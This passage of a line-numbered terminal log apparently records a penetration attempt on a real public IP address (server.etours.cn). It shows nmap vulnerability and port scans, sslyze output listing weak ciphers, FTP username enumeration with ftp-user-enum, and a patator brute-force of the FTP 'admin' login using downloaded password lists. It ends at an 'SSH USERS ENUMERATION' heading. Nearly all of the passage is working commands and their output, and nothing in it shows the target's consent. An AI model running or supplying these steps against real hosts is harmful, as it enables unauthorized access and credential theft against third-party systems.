  2366. | [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
  2367. | [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
  2368. | [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
  2369. | [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
  2370. | [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
  2371. | [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
  2372. |
  2373. | OSVDB - http://www.osvdb.org:
  2374. | [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
  2375. | [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
  2376. | [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
  2377. | [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
  2378. | [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
  2379. | [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
  2380. | [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
  2381. | [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
  2382. | [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
  2383. | [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
  2384. | [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
  2385. | [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
  2386. | [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
  2387. | [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
  2388. | [56921] OpenSSH Unspecified Remote Compromise
  2389. | [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
  2390. | [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
  2391. | [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
  2392. | [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
  2393. | [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
  2394. | [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
  2395. | [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
  2396. | [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
  2397. | [43745] OpenSSH X11 Forwarding Local Session Hijacking
  2398. | [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
  2399. | [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
  2400. | [37315] pam_usb OpenSSH Authentication Unspecified Issue
  2401. | [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
  2402. | [34601] OPIE w/ OpenSSH Account Enumeration
  2403. | [34600] OpenSSH S/KEY Authentication Account Enumeration
  2404. | [32721] OpenSSH Username Password Complexity Account Enumeration
  2405. | [30232] OpenSSH Privilege Separation Monitor Weakness
  2406. | [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
  2407. | [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
  2408. | [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
  2409. | [29152] OpenSSH Identical Block Packet DoS
  2410. | [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
  2411. | [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
  2412. | [22692] OpenSSH scp Command Line Filename Processing Command Injection
  2413. | [20216] OpenSSH with KerberosV Remote Authentication Bypass
  2414. | [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
  2415. | [19141] OpenSSH GSSAPIAuthentication Credential Escalation
  2416. | [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
  2417. | [16567] OpenSSH Privilege Separation LoginGraceTime DoS
  2418. | [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
  2419. | [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
  2420. | [9550] OpenSSH scp Traversal Arbitrary File Overwrite
  2421. | [6601] OpenSSH *realloc() Unspecified Memory Errors
  2422. | [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
  2423. | [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
  2424. | [6072] OpenSSH PAM Conversation Function Stack Modification
  2425. | [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
  2426. | [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
  2427. | [5408] OpenSSH echo simulation Information Disclosure
  2428. | [5113] OpenSSH NIS YP Netgroups Authentication Bypass
  2429. | [4536] OpenSSH Portable AIX linker Privilege Escalation
  2430. | [3938] OpenSSL and OpenSSH /dev/random Check Failure
  2431. | [3456] OpenSSH buffer_append_space() Heap Corruption
  2432. | [2557] OpenSSH Multiple Buffer Management Multiple Overflows
  2433. | [2140] OpenSSH w/ PAM Username Validity Timing Attack
  2434. | [2112] OpenSSH Reverse DNS Lookup Bypass
  2435. | [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
  2436. | [1853] OpenSSH Symbolic Link 'cookies' File Removal
  2437. | [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
  2438. | [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
  2439. | [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
  2440. | [688] OpenSSH UseLogin Environment Variable Local Command Execution
  2441. | [642] OpenSSH Multiple Key Type ACL Bypass
  2442. | [504] OpenSSH SSHv2 Public Key Authentication Bypass
  2443. | [341] OpenSSH UseLogin Local Privilege Escalation
  2444. |_
  2445.  
  2446. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2447. Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
  2448.  
  2449.  
  2450. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p80 184.154.192.250
  2451. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:32 CST
  2452. Pre-scan script results:
  2453. | broadcast-avahi-dos:
  2454. | Discovered hosts:
  2455. | 224.0.0.251
  2456. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2457. |_ Hosts are all up (not vulnerable).
  2458.  
  2459.  
  2460. root@blackbox:/usr/share/nmap/scripts# nmap --script vuln -p443 184.154.192.250
  2461. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:41 CST
  2462. Pre-scan script results:
  2463. | broadcast-avahi-dos:
  2464. | Discovered hosts:
  2465. | 224.0.0.251
  2466. | After NULL UDP avahi packet DoS (CVE-2011-1002).
  2467. |_ Hosts are all up (not vulnerable).
  2468.  
  2469.  
  2470.  
  2471.  
  2472. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250 --open
  2473. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:43 CST
  2474. Nmap scan report for server.etours.cn (184.154.192.250)
  2475. Host is up (0.037s latency).
  2476.  
  2477. PORT STATE SERVICE
  2478. 22/tcp open ssh
  2479.  
  2480. Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
  2481.  
  2482.  
  2483. root@blackbox:~# git clone https://github.com/0x4D31/hassh-utils.git
  2484. root@blackbox:~# cd hassh-utils/
  2485.  
  2486. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args database=hasshd 184.154.192.250 22
  2487. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:46 CST
  2488. Nmap scan report for server.etours.cn (184.154.192.250)
  2489. Host is up (0.14s latency).
  2490. Not shown: 981 closed ports
  2491. PORT STATE SERVICE
  2492. 21/tcp open ftp
  2493. 22/tcp open ssh
  2494. 25/tcp open smtp
  2495. 53/tcp open domain
  2496. 80/tcp open http
  2497. 106/tcp open pop3pw
  2498. 110/tcp open pop3
  2499. 111/tcp open rpcbind
  2500. 143/tcp open imap
  2501. 161/tcp filtered snmp
  2502. 443/tcp open https
  2503. 465/tcp open smtps
  2504. 554/tcp open rtsp
  2505. 587/tcp open submission
  2506. 993/tcp open imaps
  2507. 995/tcp open pop3s
  2508. 3306/tcp open mysql
  2509. 7070/tcp open realserver
  2510. 8443/tcp open https-alt
  2511.  
  2512. Nmap done: 2 IP addresses (1 host up) scanned in 15.66 seconds
  2513.  
  2514.  
  2515.  
  2516. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse --script-args client_string=SSH-2.0-asdf -p 22 184.154.192.250
  2517. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:47 CST
  2518. Nmap scan report for server.etours.cn (184.154.192.250)
  2519. Host is up (0.038s latency).
  2520.  
  2521. PORT STATE SERVICE
  2522. 22/tcp open ssh
  2523.  
  2524. Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds
  2525.  
  2526.  
  2527.  
  2528. root@blackbox:/usr/share/nmap/scripts# nmap -oN scan.nmap -v -sS -sU -T5 --top-ports 1000 184.154.192.250
  2529.  
  2530. Discovered open port 111/tcp on 184.154.192.250
  2531. Discovered open port 143/tcp on 184.154.192.250
  2532. Discovered open port 53/tcp on 184.154.192.250
  2533. Discovered open port 443/tcp on 184.154.192.250
  2534. Discovered open port 554/tcp on 184.154.192.250
  2535. Discovered open port 7070/tcp on 184.154.192.250
  2536. Discovered open port 21/tcp on 184.154.192.250
  2537. Discovered open port 22/tcp on 184.154.192.250
  2538. Discovered open port 587/tcp on 184.154.192.250
  2539. Discovered open port 80/tcp on 184.154.192.250
  2540. Discovered open port 110/tcp on 184.154.192.250
  2541. Discovered open port 25/tcp on 184.154.192.250
  2542. Discovered open port 993/tcp on 184.154.192.250
  2543. Discovered open port 3306/tcp on 184.154.192.250
  2544. Discovered open port 995/tcp on 184.154.192.250
  2545. Discovered open port 8443/tcp on 184.154.192.250
  2546. Discovered open port 106/tcp on 184.154.192.250
  2547. Discovered open port 465/tcp on 184.154.192.250
  2548. Discovered open port 111/udp on 184.154.192.250
  2549.  
  2550. Not shown: 1115 closed ports, 865 open|filtered ports
  2551. PORT STATE SERVICE
  2552. 21/tcp open ftp
  2553. 22/tcp open ssh
  2554. 25/tcp open smtp
  2555. 53/tcp open domain
  2556. 80/tcp open http
  2557. 106/tcp open pop3pw
  2558. 110/tcp open pop3
  2559. 111/tcp open rpcbind
  2560. 143/tcp open imap
  2561. 161/tcp filtered snmp
  2562. 443/tcp open https
  2563. 465/tcp open smtps
  2564. 554/tcp open rtsp
  2565. 587/tcp open submission
  2566. 993/tcp open imaps
  2567. 995/tcp open pop3s
  2568. 3306/tcp open mysql
  2569. 7070/tcp open realserver
  2570. 8443/tcp open https-alt
  2571. 111/udp open rpcbind
  2572.  
  2573.  
  2574. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 80 184.154.192.250
  2575. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:50 CST
  2576. Nmap scan report for server.etours.cn (184.154.192.250)
  2577. Host is up (0.037s latency).
  2578.  
  2579. PORT STATE SERVICE VERSION
  2580. 80/tcp open http Apache httpd (PleskLin)
  2581. |_http-server-header: Apache
  2582.  
  2583. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2584. Nmap done: 1 IP address (1 host up) scanned in 11.10 seconds
  2585.  
  2586.  
  2587. root@blackbox:/usr/share/nmap/scripts# nmap -oN vulners.nmap -sV --version-intensity 9 --script vulners -p 22 184.154.192.250
  2588. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:51 CST
  2589. Nmap scan report for server.etours.cn (184.154.192.250)
  2590. Host is up (0.037s latency).
  2591.  
  2592. PORT STATE SERVICE VERSION
  2593. 22/tcp open tcpwrapped
  2594.  
  2595. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2596. Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
  2597.  
  2598.  
  2599. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 --open -Pn 184.154.192.250 -oX test.xml -vv
  2600.  
  2601. root@blackbox:/usr/share/nmap/scripts# nmap --script ssh-hassh.nse -p 22 184.154.192.250
  2602. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:52 CST
  2603. Nmap scan report for server.etours.cn (184.154.192.250)
  2604. Host is up (0.037s latency).
  2605.  
  2606. PORT STATE SERVICE
  2607. 22/tcp open ssh
  2608.  
  2609. Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds
  2610.  
  2611. EXPLAIN SHELL
  2612.  
  2613. https://explainshell.com/explain?cmd=nmap+-sC+-sV+-v++-oN
  2614.  
  2615.  
  2616. SSL SCAN USING SSLYZE
  2617.  
  2618. root@blackbox:/usr/share/nmap/scripts# sslyze --regular 184.154.192.250:443
  2619.  
  2620.  
  2621.  
  2622. AVAILABLE PLUGINS
  2623. -----------------
  2624.  
  2625. HttpHeadersPlugin
  2626. SessionRenegotiationPlugin
  2627. CertificateInfoPlugin
  2628. SessionResumptionPlugin
  2629. FallbackScsvPlugin
  2630. OpenSslCcsInjectionPlugin
  2631. CompressionPlugin
  2632. RobotPlugin
  2633. HeartbleedPlugin
  2634. OpenSslCipherSuitesPlugin
  2635.  
  2636.  
  2637.  
  2638. CHECKING HOST(S) AVAILABILITY
  2639. -----------------------------
  2640.  
  2641. 184.154.192.250:443 => 184.154.192.250
  2642.  
  2643.  
  2644.  
  2645.  
  2646. SCAN RESULTS FOR 184.154.192.250:443 - 184.154.192.250
  2647. ------------------------------------------------------
  2648.  
  2649. * TLSV1_3 Cipher Suites:
  2650. Server rejected all cipher suites.
  2651.  
  2652. * Downgrade Attacks:
  2653. TLS_FALLBACK_SCSV: VULNERABLE - Signaling cipher suite not supported
  2654.  
  2655. * Session Renegotiation:
  2656. Client-initiated Renegotiation: OK - Rejected
  2657. Secure Renegotiation: VULNERABLE - Secure renegotiation not supported
  2658.  
  2659. * OpenSSL CCS Injection:
  2660. OK - Not vulnerable to OpenSSL CCS injection
  2661.  
  2662. * Deflate Compression:
  2663. VULNERABLE - Server supports Deflate compression
  2664.  
  2665. * Resumption Support:
  2666. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2667. With TLS Tickets: OK - Supported
  2668.  
  2669. * TLSV1_1 Cipher Suites:
  2670. Server rejected all cipher suites.
  2671.  
  2672. * ROBOT Attack:
  2673. OK - Not vulnerable
  2674.  
  2675. * SSLV3 Cipher Suites:
  2676. Forward Secrecy OK - Supported
  2677. RC4 INSECURE - Supported
  2678.  
  2679. Preferred:
  2680. None - Server followed client cipher suite preference.
  2681. Accepted:
  2682. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2683. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2684. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2685. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2686. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2687. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2688. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2689. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2690. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2691. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2692. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2693. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2694. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2695. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2696.  
  2697. * SSLV2 Cipher Suites:
  2698. Forward Secrecy INSECURE - Not Supported
  2699. RC4 INSECURE - Supported
  2700.  
  2701. Preferred:
  2702. None - Server followed client cipher suite preference.
  2703. Accepted:
  2704. SSL_CK_RC2_128_CBC_WITH_MD5 - 128 bits HTTP 200 OK
  2705. SSL_CK_RC4_128_WITH_MD5 - 128 bits HTTP 200 OK
  2706. SSL_CK_DES_192_EDE3_CBC_WITH_MD5 - 112 bits HTTP 200 OK
  2707. SSL_CK_DES_64_CBC_WITH_MD5 - 56 bits HTTP 200 OK
  2708. SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2709. SSL_CK_RC4_128_EXPORT40_WITH_MD5 - 40 bits HTTP 200 OK
  2710.  
  2711. * Certificate Information:
  2712. Content
  2713. SHA1 Fingerprint: 3f12da575e9a2e4cdc624a2c64f2b3d9e8fea274
  2714. Common Name: Parallels Panel
  2715. Issuer: Parallels Panel
  2716. Serial Number: 1315993919
  2717. Not Before: 2011-09-14 09:51:59
  2718. Not After: 2012-09-13 09:51:59
  2719. Signature Algorithm: sha1
  2720. Public Key Algorithm: RSA
  2721. Key Size: 2048
  2722. Exponent: 65537 (0x10001)
  2723. DNS Subject Alternative Names: []
  2724.  
  2725. Trust
  2726. Hostname Validation: FAILED - Certificate does NOT match 184.154.192.250
  2727. Android CA Store (8.1.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
  2728. iOS CA Store (11): FAILED - Certificate is NOT Trusted: self signed certificate
  2729. Java CA Store (jre-10.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
  2730. macOS CA Store (High Sierra): FAILED - Certificate is NOT Trusted: self signed certificate
  2731. Mozilla CA Store (2018-04-12): FAILED - Certificate is NOT Trusted: self signed certificate
  2732. Windows CA Store (2018-06-30): FAILED - Certificate is NOT Trusted: self signed certificate
  2733. Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
  2734. Received Chain: Parallels Panel
  2735. Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
  2736. Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
  2737. Received Chain Order: OK - Order is valid
  2738. Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
  2739.  
  2740. Extensions
  2741. OCSP Must-Staple: NOT SUPPORTED - Extension not found
  2742. Certificate Transparency: NOT SUPPORTED - Extension not found
  2743.  
  2744. OCSP Stapling
  2745. NOT SUPPORTED - Server did not send back an OCSP response
  2746.  
  2747. * OpenSSL Heartbleed:
  2748. OK - Not vulnerable to Heartbleed
  2749.  
  2750. * TLSV1_2 Cipher Suites:
  2751. Server rejected all cipher suites.
  2752.  
  2753. * TLSV1 Cipher Suites:
  2754. Forward Secrecy OK - Supported
  2755. RC4 INSECURE - Supported
  2756.  
  2757. Preferred:
  2758. None - Server followed client cipher suite preference.
  2759. Accepted:
  2760. TLS_DHE_RSA_WITH_AES_256_CBC_SHA DH-1024 bits 256 bits HTTP 200 OK
  2761. TLS_RSA_WITH_AES_256_CBC_SHA - 256 bits HTTP 200 OK
  2762. TLS_DHE_RSA_WITH_AES_128_CBC_SHA DH-1024 bits 128 bits HTTP 200 OK
  2763. TLS_RSA_WITH_AES_128_CBC_SHA - 128 bits HTTP 200 OK
  2764. TLS_RSA_WITH_RC4_128_SHA - 128 bits HTTP 200 OK
  2765. TLS_RSA_WITH_RC4_128_MD5 - 128 bits HTTP 200 OK
  2766. TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA DH-1024 bits 112 bits HTTP 200 OK
  2767. TLS_RSA_WITH_3DES_EDE_CBC_SHA - 112 bits HTTP 200 OK
  2768. TLS_DHE_RSA_WITH_DES_CBC_SHA DH-1024 bits 56 bits HTTP 200 OK
  2769. TLS_RSA_WITH_DES_CBC_SHA - 56 bits HTTP 200 OK
  2770. TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA DH-512 bits 40 bits HTTP 200 OK
  2771. TLS_RSA_EXPORT_WITH_DES40_CBC_SHA - 40 bits HTTP 200 OK
  2772. TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - 40 bits HTTP 200 OK
  2773. TLS_RSA_EXPORT_WITH_RC4_40_MD5 - 40 bits HTTP 200 OK
  2774.  
  2775.  
  2776. SCAN COMPLETED IN 18.49 S
  2777. -------------------------
  2778.  
  2779.  
  2780.  
  2781. CHECK ANONYMOUS FTP LOGIN FTP Client for File Traversal
  2782.  
  2783. root@blackbox:/usr/share/nmap/scripts# ftp 184.154.192.250
  2784. Connected to 184.154.192.250.
  2785. 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  2786. Name (184.154.192.250:root):
  2787. 331 Password required for root
  2788. Password:
  2789. 530 Login incorrect.
  2790. Login failed.
  2791. Remote system type is UNIX.
  2792. Using binary mode to transfer files.
  2793. ftp> quit
  2794. 221 Goodbye.
  2795.  
  2796.  
  2797. download password list from here:
  2798.  
  2799. https://github.com/berzerk0/Probable-Wordlists
  2800.  
  2801. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  2802. root@blackbox:~# cd wordlist/
  2803. root@blackbox:~/wordlist# ls
  2804. adobe_top100_password.txt passlist.txt router_default_password.md
  2805. hydra.restore rdp_passlist.txt ssh_passwd.txt
  2806. pass_list.rar README.md usernames.txt
  2807.  
  2808. or search locally
  2809.  
  2810. user list
  2811. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2812.  
  2813. root@blackbox:/opt/patator# locate john.txt
  2814. /opt/commix/src/txt/passwords_john.txt
  2815. /opt/hacktronian/commix/src/txt/passwords_john.txt
  2816. /usr/share/commix/src/txt/passwords_john.txt
  2817.  
  2818.  
  2819. ftp-user-enum
  2820.  
  2821. root@blackbox:/opt# wget http://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz
  2822. root@blackbox:/opt# tar -xzf ftp-user-enum-1.0.tar.gz
  2823. root@blackbox:/opt# cd ftp-user-enum-1.0/
  2824. root@blackbox:/opt/ftp-user-enum-1.0# cp ftp-user-enum.pl /usr/local/bin/
  2825. root@blackbox:/opt/ftp-user-enum-1.0# perl -MCPAN -e shell
  2826. cpan[1]> install Getopt::Std
  2827. cpan[2]> exit
  2828. Lockfile removed.
  2829.  
  2830.  
  2831. root@blackbox:/opt/ftp-user-enum-1.0# ls
  2832. CHANGELOG COPYING COPYING.GPL ftp-user-enum.pl ftp-user-enum-user-docs.pdf
  2833. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M sol -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2834. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2835.  
  2836. ----------------------------------------------------------
  2837. | Scan Information |
  2838. ----------------------------------------------------------
  2839.  
  2840. Mode ..................... sol
  2841. Worker Processes ......... 5
  2842. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2843. Target count ............. 1
  2844. Username count ........... 34
  2845. Target TCP port .......... 21
  2846. Query timeout ............ 15 secs
  2847.  
  2848. ######## Scan started at Wed Jan 22 14:56:54 2020 #########
  2849. @184.154.192.250: bee
  2850. @184.154.192.250: administrator
  2851. @184.154.192.250: anonymous
  2852. @184.154.192.250: admin
  2853. @184.154.192.250: guest
  2854. @184.154.192.250: ftp
  2855. @184.154.192.250: GUEST
  2856. @184.154.192.250: info
  2857. @184.154.192.250: mail
  2858. @184.154.192.250: mysql
  2859. @184.154.192.250: msfadmin
  2860. @184.154.192.250: nobody
  2861. @184.154.192.250: mailadmin
  2862. @184.154.192.250: owaspbwa
  2863. @184.154.192.250: private
  2864. @184.154.192.250: postfix
  2865. @184.154.192.250: proftpd
  2866. @184.154.192.250: postgres
  2867. @184.154.192.250: root
  2868. @184.154.192.250: public
  2869. @184.154.192.250: support
  2870. @184.154.192.250: sys
  2871. @184.154.192.250: superadmin
  2872. @184.154.192.250: systemadmin
  2873. @184.154.192.250: system
  2874. @184.154.192.250: systemadministrator
  2875. @184.154.192.250: test
  2876. @184.154.192.250: tomcat
  2877. @184.154.192.250: webmaster
  2878. @184.154.192.250: user
  2879. [email protected]: Fortimanager_Access
  2880. ######## Scan completed at Wed Jan 22 14:58:39 2020 #########
  2881. 34 results.
  2882.  
  2883. 34 queries in 105 seconds (0.3 queries / sec)
  2884.  
  2885. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -M iu -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2886. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2887.  
  2888. ----------------------------------------------------------
  2889. | Scan Information |
  2890. ----------------------------------------------------------
  2891.  
  2892. Mode ..................... iu
  2893. Worker Processes ......... 5
  2894. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2895. Target count ............. 1
  2896. Username count ........... 34
  2897. Target TCP port .......... 21
  2898. Query timeout ............ 15 secs
  2899.  
  2900. ######## Scan started at Wed Jan 22 14:59:28 2020 #########
  2901. @184.154.192.250: administrator
  2902. @184.154.192.250: anonymous
  2903. @184.154.192.250: admin
  2904. @184.154.192.250: bee
  2905. @184.154.192.250: ftp
  2906. @184.154.192.250: GUEST
  2907. @184.154.192.250: guest
  2908. @184.154.192.250: info
  2909. @184.154.192.250: mail
  2910. @184.154.192.250: mailadmin
  2911. @184.154.192.250: msfadmin
  2912. @184.154.192.250: mysql
  2913. @184.154.192.250: nobody
  2914. @184.154.192.250: owaspbwa
  2915. @184.154.192.250: postfix
  2916. @184.154.192.250: postgres
  2917. @184.154.192.250: private
  2918. @184.154.192.250: proftpd
  2919. @184.154.192.250: public
  2920. @184.154.192.250: root
  2921. @184.154.192.250: superadmin
  2922. @184.154.192.250: support
  2923. @184.154.192.250: sys
  2924. @184.154.192.250: system
  2925. @184.154.192.250: systemadmin
  2926. @184.154.192.250: test
  2927. @184.154.192.250: systemadministrator
  2928. @184.154.192.250: tomcat
  2929. @184.154.192.250: user
  2930. @184.154.192.250: webmaster
  2931. [email protected]: Fortimanager_Access
  2932. ######## Scan completed at Wed Jan 22 14:59:33 2020 #########
  2933. 34 results.
  2934.  
  2935. 34 queries in 5 seconds (6.8 queries / sec)
  2936.  
  2937.  
  2938. root@blackbox:/opt/ftp-user-enum-1.0# ftp-user-enum.pl -U /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -t 184.154.192.250
  2939. Starting ftp-user-enum v1.0 ( http://pentestmonkey.net/tools/ftp-user-enum )
  2940.  
  2941. ----------------------------------------------------------
  2942. | Scan Information |
  2943. ----------------------------------------------------------
  2944.  
  2945. Mode ..................... sol
  2946. Worker Processes ......... 5
  2947. Usernames file ........... /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  2948. Target count ............. 1
  2949. Username count ........... 34
  2950. Target TCP port .......... 21
  2951. Query timeout ............ 15 secs
  2952.  
  2953. ######## Scan started at Wed Jan 22 15:00:21 2020 #########
  2954. @184.154.192.250: administrator
  2955. @184.154.192.250: anonymous
  2956. @184.154.192.250: admin
  2957. @184.154.192.250: bee
  2958. @184.154.192.250: ftp
  2959. @184.154.192.250: guest
  2960. @184.154.192.250: GUEST
  2961. @184.154.192.250: info
  2962. @184.154.192.250: mail
  2963. @184.154.192.250: mailadmin
  2964. @184.154.192.250: msfadmin
  2965. @184.154.192.250: mysql
  2966. @184.154.192.250: nobody
  2967. @184.154.192.250: owaspbwa
  2968. @184.154.192.250: postfix
  2969. @184.154.192.250: postgres
  2970. @184.154.192.250: private
  2971. @184.154.192.250: proftpd
  2972. @184.154.192.250: public
  2973. @184.154.192.250: root
  2974. @184.154.192.250: superadmin
  2975. @184.154.192.250: support
  2976. @184.154.192.250: sys
  2977. @184.154.192.250: systemadmin
  2978. @184.154.192.250: systemadministrator
  2979. @184.154.192.250: test
  2980. @184.154.192.250: tomcat
  2981. @184.154.192.250: system
  2982. @184.154.192.250: user
  2983. @184.154.192.250: webmaster
  2984. [email protected]: Fortimanager_Access
  2985. ######## Scan completed at Wed Jan 22 15:02:06 2020 #########
  2986. 34 results.
  2987.  
  2988. 34 queries in 105 seconds (0.3 queries / sec)
  2989.  
  2990.  
  2991. root@blackbox:/opt# git clone https://github.com/lanjelot/patator
  2992. root@blackbox:/opt/patator# python patator.py ftp_login --help
  2993.  
  2994.  
  2995. root@blackbox:/opt/patator# patator ftp_login host=184.154.192.250 user=admin password=FILE0 0=/opt/commix/src/txt/passwords_john.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
  2996.  
  2997. 15:03:18 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2020-01-22 15:03 CST
  2998. 15:03:18 patator INFO - Progress: 0.0% (0/1) | Speed: 10 r/s | ETC: 15:03:18 (00:00:00 remaining)
  2999. 15:03:18 patator INFO -
  3000. 15:03:18 patator INFO - code size time | candidate | num | mesg
  3001. 15:03:18 patator INFO - -----------------------------------------------------------------------------
  3002. 15:06:01 patator INFO - Hits/Done/Skip/Fail/Size: 0/3108/0/0/3108, Avg: 19 r/s, Time: 0h 2m 43s
  3003.  
  3004.  
  3005. SSH USERS ENUMERATION
  3006.  
